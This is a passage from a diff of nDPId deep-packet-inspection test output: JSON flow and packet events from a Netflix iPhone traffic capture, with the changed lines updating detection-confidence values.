{"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 
+01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064669,"flow_last_seen":1484319064669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064669,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1484319064669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064669,"pkt":"gCqoTGHM5JjWH70UCABFAABAhwJAAEAGqhTAqAEHNr8RM8\/JAbsptVYdAAAAALAC\/\/+MwgAAAgQFtAEDAwUBAQgKH2Uv3QAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064671,"flow_last_seen":1484319064671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064671,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1484319064671,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064671,"pkt":"gCqoTGHM5JjWH70UCABFAABAbOBAAEAGxDbAqAEHNr8RM8\/SAbtTxg2UAAAAALAC\/\/+rMAAAAgQFtAEDAwUBAQgKH2Uv3gAAAAAEAgAA"} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1484319064683,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1484319064683,"pkt":"gCqoTGHM5JjWH70UCABFAABFcJ0AAP8Rx7HAqAEHwKgBAe4iADUAMSObED0BAAABAAAAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAE="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1484319064699,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1484319064699,"pkt":"5JjWH70UgCqoTGHMCABFAADq4UlAAEAR1WDAqAEBwKgBBwA17iIA1plWED2BgAABAAkAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAMABkHaWNobmFlYQdsYXRlbmN5BnByb2RhYcAYwDUAAQABAAAAFgAENCUk\/MA1AAEAAQAAABYABDQrZhTANQABAAEAAAAWAAQ0Iv+pwDUAAQABAAAAFgAENBhu0sA1AAEAAQAAABYABDQK7rvANQABAAEAAAAWAAQ2RB9SwDUAAQABAAAAFgAENCdXJMA1AAEAAQAAABYABDQobnM="} 
-00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319064699,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.37.36.252"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319064699,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.37.36.252"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064711,"flow_last_seen":1484319064711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064711,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1484319064711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064711,"pkt":"gCqoTGHM5JjWH70UCABFAABAfOpAAEAGov3AqAEHNCUk\/M\/TAbvE99WSAAAAALAC\/\/9grAAAAgQFtAEDAwUBAQgKH2UwAgAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z9JcNkhzU8YNlaASOJDYrwAAAgQFtAQCCAqtilitH2Uv3gEDAwg="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z8mqa43KKbVWHqASOJAmtQAAAgQFtAQCCAqtilitH2Uv3QEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1484319064723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064723,"pkt":"gCqoTGHM5JjWH70UCABFAAA06mxAAEAGRrbAqAEHNr8RM8\/SAbtTxg2VXDZIdIAQEBUvyAAAAQEICh9lMA6tilit"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1484319064724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064724,"pkt":"gCqoTGHM5JjWH70UCABFAAA0RtdAAEAG6kvAqAEHNr8RM8\/JAbsptVYeqmuNy4AQEBV9zAAAAQEICh9lMA6tilit"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1484319064781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064781,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGNcw0JST8wKgBBwG7z9NfgzodxPfVk6ASRersYQAAAgQFtAQCCAqFpSALH2UwAgEDAwg="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1484319064782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064782,"pkt":"gCqoTGHM5JjWH70UCABFAAA0MmJAAEAG7ZHAqAEHNCUk\/M\/TAbvE99WTX4M6HoAQEBVQwAAAAQEICh9lMEaFpSAL"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064671,"flow_last_seen":1484319064898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319064898,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1977,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064711,"flow_last_seen":1484319064950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3125,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319064950,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} 